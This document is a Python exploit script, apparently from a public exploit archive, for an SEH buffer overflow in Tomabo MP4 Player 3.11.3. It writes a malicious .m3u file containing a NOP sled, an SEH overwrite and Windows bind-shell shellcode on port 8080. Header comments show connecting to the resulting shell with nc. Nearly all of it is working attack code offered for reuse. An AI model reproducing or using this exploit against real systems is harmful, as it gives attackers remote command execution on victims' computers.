#!/usr/bin/python # Exploit Title: Tomabo MP4 Player 3.11.3 - (.m3u) SEH Buffer Overflow # Date: 03/08/2015 # Exploit Author: Saeid Atabaki # E-Mail: bytecod3r <at> gmail.com, saeid <at> Nsecurity.org # Linkedin: https://www.linkedin.com/in/saeidatabaki # Vendor Homepage: http://tomabo.com/mp4-player/index.html # Version: 3.11.3 # Tested on: Windows XP SP3 #---------------------------------------------------------------------# # Badchars: "\x00\x0a\x0d\x0c\x20\x09\x1a"' # # nc 192.168.11.136 8080 # Microsoft Windows XP [Version 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # # C:\Documents and Settings\Administrator\Desktop> #---------------------------------------------------------------------# import sys, struct file="crash.m3u" # Windows bind shell port 8080, feel free to swap shellcode sc = "" sc += "\xdd\xc1\xd9\x74\x24\xf4\xb8\xd3\x4b\xb2\xa4\x5d\x31" sc += "\xc9\xb1\x53\x31\x45\x17\x83\xc5\x04\x03\x96\x58\x50" sc += "\x51\xe4\xb7\x16\x9a\x14\x48\x77\x12\xf1\x79\xb7\x40" sc += "\x72\x29\x07\x02\xd6\xc6\xec\x46\xc2\x5d\x80\x4e\xe5" sc += "\xd6\x2f\xa9\xc8\xe7\x1c\x89\x4b\x64\x5f\xde\xab\x55" sc += "\x90\x13\xaa\x92\xcd\xde\xfe\x4b\x99\x4d\xee\xf8\xd7" sc += "\x4d\x85\xb3\xf6\xd5\x7a\x03\xf8\xf4\x2d\x1f\xa3\xd6" sc += "\xcc\xcc\xdf\x5e\xd6\x11\xe5\x29\x6d\xe1\x91\xab\xa7" sc += "\x3b\x59\x07\x86\xf3\xa8\x59\xcf\x34\x53\x2c\x39\x47" sc += "\xee\x37\xfe\x35\x34\xbd\xe4\x9e\xbf\x65\xc0\x1f\x13" sc += "\xf3\x83\x2c\xd8\x77\xcb\x30\xdf\x54\x60\x4c\x54\x5b" sc += "\xa6\xc4\x2e\x78\x62\x8c\xf5\xe1\x33\x68\x5b\x1d\x23" sc += "\xd3\x04\xbb\x28\xfe\x51\xb6\x73\x97\x96\xfb\x8b\x67" sc += "\xb1\x8c\xf8\x55\x1e\x27\x96\xd5\xd7\xe1\x61\x19\xc2" sc += "\x56\xfd\xe4\xed\xa6\xd4\x22\xb9\xf6\x4e\x82\xc2\x9c" sc += "\x8e\x2b\x17\x08\x86\x8a\xc8\x2f\x6b\x6c\xb9\xef\xc3" sc += "\x05\xd3\xff\x3c\x35\xdc\xd5\x55\xde\x21\xd6\x46\x8f" sc += "\xaf\x30\x12\xbf\xf9\xeb\x8a\x7d\xde\x23\x2d\x7d\x34" sc += "\x1c\xd9\x36\x5e\x9b\xe6\xc6\x74\x8b\x70\x4d\x9b\x0f" sc += "\x61\x52\xb6\x27\xf6\xc5\x4c\xa6\xb5\x74\x50\xe3\x2d" sc += "\x14\xc3\x68\xad\x53\xf8\x26\xfa\x34\xce\x3e\x6e\xa9" sc += "\x69\xe9\x8c\x30\xef\xd2\x14\xef\xcc\xdd\x95\x62\x68" sc += "\xfa\x85\xba\x71\x46\xf1\x12\x24\x10\xaf\xd4\x9e\xd2" sc += "\x19\x8f\x4d\xbd\xcd\x56\xbe\x7e\x8b\x56\xeb\x08\x73" sc += "\xe6\x42\x4d\x8c\xc7\x02\x59\xf5\x35\xb3\xa6\x2c\xfe" sc += "\xc3\xec\x6c\x57\x4c\xa9\xe5\xe5\x11\x4a\xd0\x2a\x2c" sc += "\xc9\xd0\xd2\xcb\xd1\x91\xd7\x90\x55\x4a\xaa\x89\x33" sc += "\x6c\x19\xa9\x11" payload = "\x90" * 1028 + "\xeb\x18\x90\x90" + "\x69\x9e\x48\x00" + "\x90" * 20 + sc writeFile = open (file, "w") writeFile.write( payload ) writeFile.close()